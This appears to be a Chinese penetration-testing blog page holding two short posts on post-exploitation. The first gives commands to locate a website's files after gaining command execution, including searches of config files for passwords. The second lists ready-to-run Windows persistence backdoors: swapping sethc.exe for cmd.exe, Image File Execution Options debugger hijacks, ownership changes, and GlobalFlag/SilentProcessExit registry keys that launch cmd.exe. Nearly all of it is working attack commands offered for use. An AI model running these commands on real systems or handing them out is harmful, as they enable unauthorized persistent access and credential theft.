knickers 发布的文章

搜索网站文件路径小技巧

环境是当能执行单条命令的时候未找到网站路径怎么去找,比如有命令执行,或者xp_cmdshell执行的时候。

Linux下:

find / -name logo_11.png

linux搜索文件内容

grep -r "pass" ./

windows:

IIS:

type C:\WINDOWS\system32\inetsrv\MetaBase.xml | findstr "Path"

其他:
搜索文件位置/搜索conf内带password内容的文本

for /r E:\ %i in (*.jsp) do @echo %i
where /R E:\ *.jsp
find /  -name "*.conf" 2>&1 | xargs grep -s -i 'password' > xxoo.txt

使用GlobalFlags劫持任意进程镜像持久化/sethc.exe在不同版本后门应用整理

[toc]

windows 2k3

单条命令执行

windows 2003/xp
这种方式就比较普遍了
利用copy来替换sethc.exe

copy c:\windows\system32\sethc.exe c:\windows\system32\sethc2.exe
copy c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe

windows 2008/win7

单条命令执行

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f

Jietu20191216-164505
或者还可以使用上面的功能。不过需要修改权限。
所有文件及文件夹、子文件夹下的所有者更改为管理员组(administrators)

takeown /f c:\windows\system32\sethc.*   /a /r /d y
cacls  c:\windows\system32\sethc.*  /T /E /G administrators:F

-w806

多条命令执行

在看到近期一个表哥发的文章可以利用映像劫持的方式留shift后门,在5下shift后成功弹出了sethc,然后还可以在执行恶意文件
其中利用的方式

Shfit映像劫持后门新玩法

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v ReportingMode /t REG_DWORD /d 1  /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\sethc.exe" /v MonitorProcess /t REG_SZ /d "c:\windows\system32\cmd.exe" /f

Jietu20191216-152933

Global Flags劫持任意exe镜像

上面的文章中提到了Globalflags,这个工具是包含在 Debugging Tools for Windows(WinDbg)下的。
本地可以利用winsdk_web.exe去安装。

-w588

点击应用后在打开notepad后

这里是利用gflags的监视进程把监视进程设置成cmd.exe,原理就是修改了三个注册表内容,添加了MonitorProcess的键值。

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\calc.exe" /v GlobalFlag /t REG_DWORD /d 512 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\calc.exe" /v ReportingMode /t REG_DWORD /d 1  /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\calc.exe" /v MonitorProcess /t REG_SZ /d "c:\windows\system32\cmd.exe" /f

https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/
https://payloads.cn/2019/1205/shfit-image-hijacks-backdoor-new-gameplay.html
https://www.anquanke.com/post/id/151425

  1. 1
  2. 2
  3. 3
  4. 4
  5. 5
  6. ...
  7. 18